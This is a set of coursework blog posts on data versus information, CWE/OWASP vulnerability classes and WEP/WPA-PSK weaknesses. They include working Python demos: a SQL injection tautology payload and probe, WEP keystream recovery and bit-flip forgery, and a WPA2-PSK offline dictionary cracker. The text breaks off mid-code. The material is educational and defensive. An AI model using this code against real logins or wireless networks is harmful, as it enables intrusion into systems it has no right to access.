Friday, September 16, 2016

Data vs Information

  • A collection of data arranged for ease and speed of search and retrieval: database
  • Raw material from which you can draw conclusions: data
  • Knowledge, intelligence, a particular piece of data with a special meaning or function: information

List specific data that the school collects about each student. What information could be gathered using all the student data?
· Scores in individual subjects > class average in each subject / class average as a whole > school average in each subject / across all subjects
· Address of each student > which state the maximum number of students come from
And so on

a.    Write examples of data and information related to any of the sites. 

A database schema for IMDb may look like this: i.imgur.com/pDq0n.png


Say there is a TV series called Mr. Robot.

In the title table there may be a row holding the title of an episode, a season id, an episode number and a lot of other data, but on its own it is of no use without a proper query joining all the tables.

On the other hand, if I query for a keyword, say episode 5 of season 2, I get what exactly happened in that episode, what the audience rating was and so on; this is information worth reading for me.

b.    State why you believe data collections of this type could be important.

Information is something of importance: I don't want to spend my next 45 minutes watching a TV episode that is crap. The data collection mentioned above just helped me with that, because the data is arranged in a structured manner that can be queried to give information useful to me.



 3. Choose a website that displays data that might be stored in a database; find 10 data items on the site and list 5 pieces of information that could be gleaned from the data.

Let's take the example of auctions.godaddy.com. Each row in each table mentioned below is data which has no value for me individually:
I. There might be an Auction table with a serial id as primary key, a domain id referenced from the Domain table as a foreign key, a seller id mapped to another table as a foreign key, a price and so on.
II. There may be another table with seller details, which is also referenced by the table in point I.
III. There might be a table with traffic details, one row per visit, with a domain id column mapped to the Domain table as a foreign key.
IV. The Domain table might have the domain id referenced in points I and III as its primary key. There might be a value column updated by nightly or weekly evaluation jobs running on the backend, and a name column that also carries a unique key. There might also be a tld id column to group domains by TLD; tld id may be a foreign key to the TLD table.
V. There might be a TLD table with id as primary key, referenced in point IV as a foreign key, a TLD name with a unique key constraint, and a column specifying whether GoDaddy supports direct transfer or not (true/false).
VI. There might be a Bid table with bidId as primary key, a foreign key reference to the Auction table identifying which auction entry the bid was made for, and, to identify the type of bid, a bidCategoryId which may be a foreign key to the BidCategory table. There might also be an expireOn column; if bidCategoryId refers to "buy now", it might be set to some default value.
VII. There will be a BidCategory table holding values like fixed bid, make offer, buy now and so on.
VIII. There might be a FeaturedAuction table holding ids referenced from the Auction table as foreign keys, plus the start and end time of being featured.
IX. There might be a Currency table identifying the seller's preferred currency, referenced as a foreign key from the seller table in point II. Say a seller row in point II refers to the currency with id 10; it might be named USD with the symbol $.
X. There might be a table identifying the types of bids allowed for an auction entry in point I. The table in point VI records what the buyer selected, but to identify which options an auction entry offers, there might be a table with one row per (auctionId, allowedBidType) pair.
And so on
list 5 pieces of information that could be gleaned from the data:
I. Say I want to buy a domain whose name starts with "hemant" and is available under auction; I might need several joins in the query to get this information from the above tables.
II. Say I want to buy a domain with a minimum price of $2 or a maximum price of $100; I might extract this information from the rows of the above tables.
III. Say I want a domain with exactly 5 characters; this information can be extracted.
IV. Say I want to buy a domain with more than 100 visits of traffic; this information can be extracted here.
V. Say I want to buy the domain with the highest number of bids (which I think makes it valuable); I may extract this information from the above tables.
And so on
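To show that the five questions above really are just joins over the sketched tables, here is an added example (my own code, not anything from auctions.godaddy.com): the schema from points I to X built as an in-memory SQLite database with a handful of constructed rows, and one query per question. Table and column names are assumptions that follow the sketch; the domain names, prices, visits and bids are made up.

```python
import sqlite3

# Schema following the sketch above (names are assumptions); foreign keys
# are declared so the relationships in points I-X are explicit.
SCHEMA = """
CREATE TABLE tld          (id INTEGER PRIMARY KEY, name TEXT UNIQUE NOT NULL,
                           direct_transfer INTEGER NOT NULL);
CREATE TABLE currency     (id INTEGER PRIMARY KEY, name TEXT NOT NULL, symbol TEXT NOT NULL);
CREATE TABLE seller       (id INTEGER PRIMARY KEY, name TEXT NOT NULL,
                           currency_id INTEGER NOT NULL REFERENCES currency(id));
CREATE TABLE domain       (id INTEGER PRIMARY KEY, name TEXT UNIQUE NOT NULL, value REAL,
                           tld_id INTEGER NOT NULL REFERENCES tld(id));
CREATE TABLE auction      (id INTEGER PRIMARY KEY, domain_id INTEGER NOT NULL REFERENCES domain(id),
                           seller_id INTEGER NOT NULL REFERENCES seller(id), price REAL NOT NULL);
CREATE TABLE traffic      (id INTEGER PRIMARY KEY, domain_id INTEGER NOT NULL REFERENCES domain(id),
                           visited_at TEXT NOT NULL);
CREATE TABLE bid_category (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
CREATE TABLE bid          (id INTEGER PRIMARY KEY, auction_id INTEGER NOT NULL REFERENCES auction(id),
                           bid_category_id INTEGER NOT NULL REFERENCES bid_category(id),
                           amount REAL NOT NULL, expire_on TEXT);
"""

# Joins shared by every question: an auction entry, its domain and its TLD.
FROM_AUCTIONS = """FROM auction a
                   JOIN domain d ON d.id = a.domain_id
                   JOIN tld t    ON t.id = d.tld_id"""

def build_db():
    """In-memory database filled with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO tld VALUES (?,?,?)", [(1, "com", 1), (2, "net", 0)])
    conn.execute("INSERT INTO currency VALUES (10, 'USD', '$')")
    conn.executemany("INSERT INTO seller VALUES (?,?,?)", [(1, "alice", 10), (2, "bob", 10)])
    conn.executemany("INSERT INTO domain VALUES (?,?,?,?)",
                     [(1, "hemant", 50.0, 1), (2, "hemantsoft", 500.0, 2),
                      (3, "pizza", 20.0, 1), (4, "abcde", 5.0, 1)])
    conn.executemany("INSERT INTO auction VALUES (?,?,?,?)",
                     [(1, 1, 1, 2.0), (2, 2, 2, 150.0), (3, 3, 1, 99.0), (4, 4, 2, 1.0)])
    conn.executemany("INSERT INTO bid_category VALUES (?,?)",
                     [(1, "fixed bid"), (2, "make offer"), (3, "buy now")])
    conn.executemany("INSERT INTO bid VALUES (?,?,?,?,?)",
                     [(1, 1, 1, 5.0, None), (2, 1, 2, 7.0, None), (3, 1, 1, 9.0, None),
                      (4, 2, 1, 160.0, None), (5, 2, 3, 200.0, "2016-12-31"),
                      (6, 3, 2, 80.0, None)])
    # one traffic row per visit: 120 visits for hemant.com, 30 for pizza.com
    visits = [(1, "2016-09-01")] * 120 + [(3, "2016-09-02")] * 30
    conn.executemany("INSERT INTO traffic (domain_id, visited_at) VALUES (?,?)", visits)
    return conn

def _names(conn, sql, params=()):
    return [row[0] for row in conn.execute(sql, params)]

def domains_starting_with(conn, prefix):
    # I. prefix search; the user value is bound, never concatenated into the SQL
    return _names(conn, f"""SELECT d.name || '.' || t.name {FROM_AUCTIONS}
                            WHERE d.name LIKE ? ORDER BY d.name""", (prefix + "%",))

def price_between(conn, lo, hi):
    # II. price range on the auction entry
    return _names(conn, f"""SELECT d.name || '.' || t.name {FROM_AUCTIONS}
                            WHERE a.price BETWEEN ? AND ? ORDER BY a.price""", (lo, hi))

def exactly_n_chars(conn, n):
    # III. length of the name label (without the TLD)
    return _names(conn, f"""SELECT d.name || '.' || t.name {FROM_AUCTIONS}
                            WHERE length(d.name) = ? ORDER BY d.name""", (n,))

def traffic_more_than(conn, visits):
    # IV. count the per-visit rows of the traffic table per domain
    return _names(conn, f"""SELECT d.name || '.' || t.name {FROM_AUCTIONS}
                            LEFT JOIN traffic tr ON tr.domain_id = d.id
                            GROUP BY d.id HAVING COUNT(tr.id) > ?
                            ORDER BY d.name""", (visits,))

def most_bids(conn):
    # V. the auction entry with the most bid rows, as (domain, bid_count)
    row = conn.execute(f"""SELECT d.name || '.' || t.name, COUNT(b.id) AS n
                           {FROM_AUCTIONS}
                           LEFT JOIN bid b ON b.auction_id = a.id
                           GROUP BY a.id ORDER BY n DESC, d.name LIMIT 1""").fetchone()
    return (row[0], row[1]) if row else None

if __name__ == "__main__":
    db = build_db()
    print(domains_starting_with(db, "hemant"), price_between(db, 2, 100),
          exactly_n_chars(db, 5), traffic_more_than(db, 100), most_bids(db))
```

Every function binds the user's value as a parameter rather than pasting it into the query text; that is the same habit that keeps these queries out of the SQL injection discussion further down this blog.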

4. Give examples of how data becomes information for these two industries:
• film/movie
Example: some entity storing a data row like (personId, movieId, roleId) is of no use to me at first look, but when queried with the right joins it can tell me the cast of a movie, and I can choose which movie I want to see based on which star I like.
• hospital/healthcare
Example: some entity in a hospital database may hold (personId, visitDate, medicationId).
On its own it is of no use to a doctor, but queried in the right way it can tell the doctor that this patient's antiviral course is already complete and no more antiviral medicine should be given. That is the real information, and it saves the patient from an overdose.

5. Using this Lunch Room Data Report, answer the questions that follow.



a.    What does this report mean?
If I sum up the first two columns and compare with the sum of the last three columns, they are equal, so I got to know:

· Date-wise, it records sales: how many items were sold to students and how many to faculty.
· Date-wise, it stores the sales of each type of stall available over the counter at a fund-raising festival.

b.    What data was collected?

See above

c.    What information does this table provide from the data collected?

See above

d.    How do you think this information is used by those reading the report?
See above

e.    Generate at least two conclusions based on the data provided.

See above

     f. Generate at least two questions that you would ask about the data provided.
· On a given day, say 4 Dec 2003, the Pizza Bar sold 126 items; out of these 126, how many were sold to students?
· On 6 Dec 2003 the Soup/Salad Bar sold 30 items, but on 02 Dec 2003 it sold 63; which food item declined in sales, and what went wrong with it?




Thursday, July 21, 2016

application vulnerabilities

There are different classes of application vulnerabilities, like SQL injection, buffer overflow, stack overflow, cross-site scripting and so on.
Categories of dangerous software errors:
  • Insecure Interaction between Components, most frequent examples:
  1. SQL Injection (CWE-89) [A1 - Injection]
  2. OS Command Injection (CWE-78) [ A1 - Injection]
  3. Cross-site Scripting (CWE-79) [A3 - Cross Site Scripting (XSS)]
  4. Unrestricted Upload of File with Dangerous Type, i.e. uploading a file that executes unwanted instructions in the target environment (CWE-434) [A4 - Insecure Direct Object References]
  5. Cross-Site Request Forgery (CWE-352) [A8 - Cross Site Request Forgery (CSRF)]
  6. Open Redirect (CWE-601) [A10 - Unvalidated Redirects and Forwards]

  • Risky Resource Management, most frequent examples:
  1. Classic Buffer Overflow(CWE-120)
  2. Path Traversal (CWE-22) [A4 - Insecure Direct Object References]
  3. Download of Code Without Integrity Check(CWE-494)
  4. Inclusion of Functionality from Untrusted Control Sphere (CWE-829) [A4 - Insecure Direct Object References]
  5. Use of Potentially Dangerous Function (CWE-676)
  6. Incorrect Calculation of Buffer Size(CWE-131)
  7. Uncontrolled Format String (CWE-134)
  8. Integer Overflow or Wraparound (CWE-190)

  • Porous Defenses, most frequent examples:
  1. Missing Authentication for Critical Function (CWE-306) [A2 - Broken Authentication and Session Management]
  2. Missing Authorization (CWE-862) [A4 - Insecure Direct Object References]
  3. Use of Hard-coded Credentials (CWE-798) [A2 - Broken Authentication and Session Management]
  4. Missing Encryption of Sensitive Data (CWE-311) [A6 - Sensitive Data Exposure]
  5. Reliance on Untrusted Inputs in a Security Decision (CWE-807)
  6. Execution with Unnecessary Privileges (CWE-250) [A5 - Security Misconfiguration]
  7. Incorrect Authorization (CWE-863) [A4 - Insecure Direct Object References] [A7 - Missing Function Level Access Control]
  8. Incorrect Permission Assignment for Critical Resource (CWE-732) [A5 - Security Misconfiguration]
  9. Use of a Broken or Risky Cryptographic Algorithm (CWE-327) [A6 - Sensitive Data Exposure]
  10. Improper Restriction of Excessive Authentication Attempts (CWE-307) [A2 - Broken Authentication and Session Management]
  11. Use of a One-Way Hash without a Salt (CWE-759) [A6 - Sensitive Data Exposure]
Note: [A9 Using Components with Known Vulnerabilities] is not mapped to any documented Common Weakness Enumeration (CWE) entry.

Select at least two application vulnerabilities, explain what they mean and discuss how you would mitigate them.

  • CWE-250: Execution with Unnecessary Privileges
This is ranked 11th in the CWE Top 25 list. The software performs an operation at a privilege level higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses. It is counted under OWASP A5 - Security Misconfiguration.
Mitigation:
  1. Architecture and Design; Operation phases: run the code under the lowest privileges that are required. Create isolated accounts with limited privileges for it.
  2. Architecture and Design phase: identify the functionality that requires additional privileges. Raise privileges as late as possible and drop them as soon as possible, protecting every communication channel that could interact with the privileged code.
  3. Implementation phase: perform extensive input validation in any privileged code.
  4. Implementation phase: make sure the calls that drop privileges actually succeed; check their results instead of assuming the drop worked.
  5. Implementation phase: explicitly allow the required actions and deny everything else.
  6. Operation; System Configuration phases: follow a hardened configuration guide to limit the attack surface and the potential risk of the deployed software.
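Mitigations 2 and 4 above are the ones people get wrong in code, so here is an added example (my own, not from the CWE entry) of dropping from root to an unprivileged uid/gid in the only order that works, followed by the check that the drop really took effect. The `api` argument is an assumption for this demo: it is the real `os` module by default, and a small fake model of the Linux calls so the logic can be run without root.

```python
import os

class PrivilegeDropError(RuntimeError):
    """Raised when the drop did not happen or did not stick."""

def drop_privileges(uid, gid, api=os):
    """Drop from root to uid/gid (groups, then gid, then uid), then verify.

    `api` supplies setgroups/setresgid/setresuid/...: the real `os` module by
    default, or FakeOS below for a demonstration without root."""
    if uid == 0 or gid == 0:
        raise PrivilegeDropError("target ids must be unprivileged")
    steps = []
    # 1. supplementary groups first: they are inherited from root and would
    #    otherwise survive the uid change (e.g. membership in 'shadow')
    api.setgroups([gid])
    steps.append("setgroups")
    # 2. gid before uid: once the uid is unprivileged, setgid would fail.
    #    Set real, effective AND saved ids so setgid(0) cannot undo it later.
    api.setresgid(gid, gid, gid)
    steps.append("setresgid")
    # 3. uid last; after this line the process is no longer root
    api.setresuid(uid, uid, uid)
    steps.append("setresuid")
    # 4. mitigation 4 above: confirm the calls took effect instead of
    #    assuming so (a failed drop with a swallowed error is worse than none)
    if api.getresuid() != (uid, uid, uid) or api.getresgid() != (gid, gid, gid):
        raise PrivilegeDropError("ids did not change as requested")
    try:
        api.setuid(0)          # must be refused now
    except PermissionError:
        steps.append("verified")
        return steps
    raise PrivilegeDropError("process could regain root after the drop")

class FakeOS:
    """Minimal model of the Linux calls used above, for running without root."""
    def __init__(self):
        self.uid, self.gid, self.groups, self.calls = (0, 0, 0), (0, 0, 0), [0], []
    def setgroups(self, groups):
        self.calls.append("setgroups"); self.groups = list(groups)
    def setresgid(self, r, e, s):
        self.calls.append("setresgid"); self.gid = (r, e, s)
    def setresuid(self, r, e, s):
        self.calls.append("setresuid"); self.uid = (r, e, s)
    def getresuid(self): return self.uid
    def getresgid(self): return self.gid
    def setuid(self, u):
        # unprivileged: may only switch among the current real/effective/saved uids
        if self.uid[1] != 0 and u not in self.uid:
            raise PermissionError("Operation not permitted")
        self.uid = (u, u, u)

class BrokenOS(FakeOS):
    """A backend whose setresuid silently does nothing; the verification
    step in drop_privileges is what catches this."""
    def setresuid(self, r, e, s):
        self.calls.append("setresuid")

if __name__ == "__main__":
    if os.geteuid() == 0:
        print(drop_privileges(65534, 65534))          # nobody/nogroup on most Linux
    else:
        print(drop_privileges(1000, 1000, api=FakeOS()))
```

Run as root this really drops to uid/gid 65534; run as a normal user it exercises the same code against the fake. Swapping in BrokenOS shows why step 4 exists: without the check the function would return success while the process is still root.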

  • CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
This is ranked 22nd in the Top 25 list. If a website, knowingly or unknowingly, allows a user or attacker to supply an external website address and then redirects to it, that is an open redirect vulnerability. It comes under OWASP A10 - Unvalidated Redirects and Forwards.
Mitigation:
  1. Implementation phase: assume all inputs are malicious.
  2. Architecture and Design phase: plan to inform the user, in a very clear and visible manner, whenever they are leaving the current application.
  3. Architecture and Design phase: if the set of possible targets is limited, avoid free-text inputs; let the client pick from a server-side list instead.
  4. Architecture and Design phase: ensure that redirects can be confirmed to originate from inside the application, e.g. by using legitimate cryptographic or random tokens.
  5. Architecture and Design; Implementation phases: enumerate all possible input methods, including indirect ones like API calls, external systems, cookies and so on.
  6. Operation phase: use an application firewall.
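Mitigation 3 in code, as an added example of mine (not from the CWE entry): a redirect-target check that accepts only a same-site path or an absolute URL whose host is on an explicit allow list, plus the stricter variant where the request carries only an index into a server-side list. The allow list, the target list and the sample inputs are assumptions.

```python
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"example.com", "accounts.example.com"}   # assumed allow list
FALLBACK = "/"                                             # where rejected targets go

def safe_redirect_target(target, allowed_hosts=ALLOWED_HOSTS, fallback=FALLBACK):
    """Return `target` if it is a same-site path or an allow-listed http(s)
    URL, otherwise `fallback`."""
    if not isinstance(target, str):
        return fallback
    t = target.strip()
    # control characters can smuggle a scheme past parsers ("java\tscript:")
    if not t or any(ord(c) < 0x20 or ord(c) == 0x7F for c in t):
        return fallback
    # browsers treat backslashes like slashes, so "/\evil.com" is "//evil.com"
    t = t.replace("\\", "/")
    try:
        parts = urlsplit(t)
    except ValueError:             # e.g. malformed IPv6 brackets
        return fallback
    if parts.scheme == "" and parts.netloc == "":
        # relative target: accept only a single-slash path on this site,
        # not "//evil.com" (protocol-relative URL)
        return t if t.startswith("/") and not t.startswith("//") else fallback
    if parts.scheme not in ("http", "https"):
        return fallback            # javascript:, data:, vbscript:, ...
    if parts.username or parts.password:
        return fallback            # "https://good@evil" confusion; never needed
    if (parts.hostname or "").lower() not in allowed_hosts:
        return fallback            # exact host match: no suffix/prefix tricks
    return urlunsplit(parts)

TARGETS = ["/account", "/settings", "https://accounts.example.com/"]  # assumed

def target_from_index(raw, targets=TARGETS, fallback=FALLBACK):
    """The stricter form of mitigation 3: the client sends only an index into
    a server-side list, so no URL is ever taken from the request."""
    try:
        i = int(raw)
    except (TypeError, ValueError):
        return fallback
    if not 0 <= i < len(targets):  # int("-1") would otherwise index from the end
        return fallback
    return targets[i]

if __name__ == "__main__":
    for sample in ["/account", "//evil.com/", "/\\evil.com", "javascript:alert(1)",
                   "https://example.com/login?x=1", "https://example.com.evil.com/",
                   "https://evil.com@example.com/"]:
        print(f"{sample!r:40} -> {safe_redirect_target(sample)!r}")
```

The host comparison is an exact match against the allow list on purpose: "ends with example.com" would admit notexample.com, and "starts with example.com" would admit example.com.evil.com.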

How would you check for SQL Injections?

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Detecting, exploiting and avoiding SQL injection are all considered simple, and it is No. 1 in the CWE Top 25 list, categorized under OWASP A1 - Injection. Without sanitizing inputs from external systems/users, inputs may be interpreted as SQL commands and executed to reveal hidden internal information or change sensitive data.
SQL injection can be avoided using parameterized queries, stored procedures (invoked with parameters, not by building SQL strings inside them), sanitizing user inputs, whitelist input validation and minimizing the privileges assigned to every database account.
Various automated dynamic/static analysis tools are available to detect SQL injection, but it should be taken care of in the Architecture and Design, Implementation and Operation phases with due care.
During the Architecture and Design phase, frameworks that prevent SQL injection may be used, separation between data and code can be enforced, the least-privilege rule can be enforced, client-side and server-side validation can be enforced, inputs may be limited to predefined options where possible, and so on.
During the Implementation phase, all inputs must be assumed to be dirty; escape or filter all characters that do not pass a predefined whitelist; use strict error handling and error messages, with output to operators that does not reveal the internals of the system; and so on.
During the Operation phase, the least-privilege rule may be enforced on the database accounts and appropriate firewall rules may be applied.
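To make the "how would you check" part concrete, here is an added example of mine (not from the CWE entry): the same login lookup written the injectable way and the parameterized way, run against a constructed in-memory SQLite table, plus the two probes a tester sends without seeing the code. The users, passwords and payload are constructed; passwords are stored in clear only to keep the demo short (a real table would hold salted hashes, cf. CWE-759 above).

```python
import sqlite3

def make_db():
    """Constructed users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password, role) VALUES (?,?,?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return conn

def login_vulnerable(conn, username, password):
    """CWE-89: the inputs become part of the SQL text itself."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return sorted(conn.execute(sql).fetchall())

def login_safe(conn, username, password):
    """Bound parameters: the statement is fixed and the values travel
    separately, so a quote in the input is data, never SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return sorted(conn.execute(sql, (username, password)).fetchall())

TAUTOLOGY = "' OR '1'='1' --"   # classic probe: makes the WHERE clause always true

def probe_for_injection(login_fn, conn):
    """Black-box check: (1) a lone quote that breaks the statement produces a
    database error, and (2) a tautology returns rows that a plainly wrong
    credential does not. Either one means the input reached the SQL parser."""
    try:
        login_fn(conn, "'", "x")
    except sqlite3.OperationalError:
        return True
    baseline = login_fn(conn, "nobody", "wrong")
    return len(login_fn(conn, TAUTOLOGY, "wrong")) > len(baseline)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, TAUTOLOGY, "x"))
    print("safe      :", login_safe(db, TAUTOLOGY, "x"))
    print(probe_for_injection(login_vulnerable, db), probe_for_injection(login_safe, db))
```

The same probe works against a real application: a 500 error on a single quote and a different response on a tautology are exactly the signals the automated scanners mentioned above look for.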





A1-Injection

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE-88: Argument Injection or Modification
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')
CWE-91: XML Injection (aka Blind XPath Injection)

A2-Broken Authentication and Session Management

CWE-256: Plaintext Storage of a Password
CWE-287: Improper Authentication
CWE-311: Missing Encryption of Sensitive Data
CWE-319: Cleartext Transmission of Sensitive Information
CWE-384: Session Fixation
CWE-522: Insufficiently Protected Credentials
CWE-523: Unprotected Transport of Credentials
CWE-613: Insufficient Session Expiration
CWE-620: Unverified Password Change
CWE-640: Weak Password Recovery Mechanism for Forgotten Password

A3-Cross-Site Scripting (XSS)

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

A4-Insecure Direct Object References

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-99: Improper Control of Resource Identifiers ('Resource Injection')
CWE-639: Authorization Bypass Through User-Controlled Key

A5-Security Misconfiguration

CWE-2: Environment
CWE-16: Configuration
CWE-209: Information Exposure Through an Error Message
CWE-215: Information Exposure Through Debug Information
CWE-548: Information Exposure Through Directory Listing

A6-Sensitive Data Exposure

CWE-310: Cryptographic Issues
CWE-311: Missing Encryption of Sensitive Data
CWE-312: Cleartext Storage of Sensitive Information
CWE-319: Cleartext Transmission of Sensitive Information
CWE-320: Key Management Errors
CWE-325: Missing Required Cryptographic Step
CWE-326: Inadequate Encryption Strength
CWE-327: Use of a Broken or Risky Cryptographic Algorithm
CWE-328: Reversible One-Way Hash

A7-Missing Function Level Access Control

CWE-285: Improper Authorization
CWE-287: Improper Authentication

A8-Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CWE-352)

A9 - Using Components with Known Vulnerabilities

unusual human error

A10 - Unvalidated Redirects and Forwards

CWE-601: URL Redirection to Untrusted Site ('Open Redirect')


Wednesday, July 20, 2016

WEP | WPA PSK

IEEE 802.11 using WEP is very weak.
The three core deficiencies of Wired Equivalent Privacy (WEP) are the use of static encryption keys (with the Rivest Cipher 4 {RC4} algorithm, a symmetric stream cipher), the ineffective use of initialization vectors (the same 24-bit IV values are used over and over again, so RC4 keystreams repeat), and the lack of packet integrity assurance (the Integrity Check Value is a plain CRC-32, so an attacker can flip specific bits in a packet and alter the ICV to match).
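The second and third deficiencies can be reproduced in a few lines, so here is an added example of mine (not from any of the course material) with a minimal RC4 and a CRC-32 ICV: two frames encrypted under the same IV XOR to the XOR of their plaintexts, one known plaintext recovers the keystream for that IV, and because CRC-32 is linear an attacker can flip bits in the ciphertext and patch the encrypted ICV without knowing the key. The key, IV and packet contents are constructed.

```python
import zlib

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same XOR."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def icv(payload: bytes) -> bytes:
    """WEP's Integrity Check Value: CRC-32, little-endian, no key involved."""
    return zlib.crc32(payload).to_bytes(4, "little")

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key, payload || ICV). The 24-bit IV is sent
    in clear, and nothing stops a station from reusing it."""
    return iv + rc4(iv + key, payload + icv(payload))

def wep_decrypt(key: bytes, frame: bytes):
    plain = rc4(frame[:3] + key, frame[3:])
    payload, received_icv = plain[:-4], plain[-4:]
    return payload, received_icv == icv(payload)

# Deficiency 2: IV reuse. Two frames under the same IV share a keystream, so
# XORing the ciphertexts cancels it and leaves plaintext1 XOR plaintext2.
def keystream_reuse(frame1: bytes, frame2: bytes) -> bytes:
    assert frame1[:3] == frame2[:3], "demonstration needs a reused IV"
    return xor(frame1[3:], frame2[3:])

def recover_with_known_plaintext(known_frame, known_payload, other_frame):
    """Knowing one plaintext (e.g. a predictable ARP packet) gives the keystream
    for that IV, which decrypts every other frame sent under the same IV."""
    keystream = xor(known_frame[3:], known_payload + icv(known_payload))
    return xor(other_frame[3:], keystream)[:-4]

# Deficiency 3: no real integrity. CRC-32 is linear:
#   crc(p XOR m) == crc(p) XOR crc(m) XOR crc(0...0)   (zeros of the same length)
# so the attacker flips bits with mask m in the ciphertext and patches the
# encrypted ICV with crc(m) XOR crc(zeros), all without knowing the key.
def flip_bits(frame: bytes, mask: bytes) -> bytes:
    iv, enc_payload, enc_icv = frame[:3], frame[3:-4], frame[-4:]
    assert len(mask) == len(enc_payload)
    icv_delta = xor(icv(mask), icv(bytes(len(mask))))
    return iv + xor(enc_payload, mask) + xor(enc_icv, icv_delta)

# constructed demo values: a 40-bit WEP key, a reused IV, two same-length packets
KEY = bytes.fromhex("0102030405")
IV = b"\x00\x00\x01"
P1 = b"GET /index.html"
P2 = b"GET /admin.html"
MASK = bytes(5) + xor(b"index", b"admin") + bytes(5)   # rewrites P1's path into P2's

if __name__ == "__main__":
    f1, f2 = wep_encrypt(KEY, IV, P1), wep_encrypt(KEY, IV, P2)
    print(keystream_reuse(f1, f2)[:len(P1)] == xor(P1, P2))
    print(recover_with_known_plaintext(f1, P1, f2))
    print(wep_decrypt(KEY, flip_bits(f1, MASK)))
```

The forged frame passes the receiver's ICV check with the attacker never having seen the key, which is why WEP's "integrity" is no integrity at all; a keyed MAC (as TKIP's Michael and CCMP's CBC-MAC are) is what the ICV should have been.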


Also briefly discuss WPA PSK mode. Is it hackable?
  1. Wi-Fi Protected Access (WPA) was an intermediate measure to take the place of WEP pending the availability of the full IEEE 802.11i standard. WPA2 replaced WPA and implements the mandatory elements of IEEE 802.11i. If an authentication server such as Remote Authentication Dial-In User Service (RADIUS) is used (reached through the AP via IEEE 802.1X), it is WPA-Enterprise; if a pre-shared key is used, it is Wi-Fi Protected Access pre-shared key (WPA PSK). In both modes a client cannot pass data traffic until the 4-way key handshake completes, but only WPA-Enterprise authenticates each user individually; in PSK mode everyone who knows the shared passphrase is admitted. At the lower layers WPA uses the Temporal Key Integrity Protocol (TKIP) [RC4], and WPA2 uses Counter Mode Cipher Block Chaining Message Authentication Code Protocol, Counter Mode CBC-MAC Protocol (CCMP) [AES algorithm]. AES (under WPA2) is a more appropriate algorithm for wireless than RC4 (under WPA).
  2. Yes, it is hackable. With a pre-shared key the pairwise master key is derived only from the passphrase and the SSID, so an attacker who captures one 4-way handshake can test passphrases offline against the handshake MIC with a wordlist, which is what tools like coWPAtty and Aircrack-ng do (see "Cracking WPA2-PSK Passwords with Cowpatty & Aircrack-Ng"). The practical defence in PSK mode is a long random passphrase that no wordlist will contain.
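To show exactly what coWPAtty and Aircrack-ng are computing, here is an added example of mine (not the tools' own code) of the WPA2-PSK key derivation and the offline dictionary attack against a constructed 4-way handshake: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes), PTK from the PMK plus both MAC addresses and both nonces, and the MIC on EAPOL message 2 keyed with the first 16 bytes of the PTK. The SSID, MAC addresses, nonces, EAPOL frame bytes, passphrase and wordlist are all made up for the demonstration.

```python
import hashlib
import hmac

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    No per-session secret goes in: the same passphrase always gives the same PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK from PMK, both MAC addresses and both nonces (all visible in a capture)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck, eapol_frame_mic_zeroed, ccmp=True):
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-SHA1
    truncated to 16 bytes for WPA2/CCMP, HMAC-MD5 for WPA/TKIP."""
    digestmod = hashlib.sha1 if ccmp else hashlib.md5
    return hmac.new(kck, eapol_frame_mic_zeroed, digestmod).digest()[:16]

def crack_psk(ssid, aa, spa, anonce, snonce, eapol_msg2, captured_mic, wordlist):
    """Offline dictionary attack: everything but the passphrase is in the
    capture, so each candidate is derived and checked against the captured MIC."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None

# ---- constructed handshake (what a sniffer would have seen) -----------------
SSID = "HomeNet"
AA = bytes.fromhex("001122334455")          # AP MAC address
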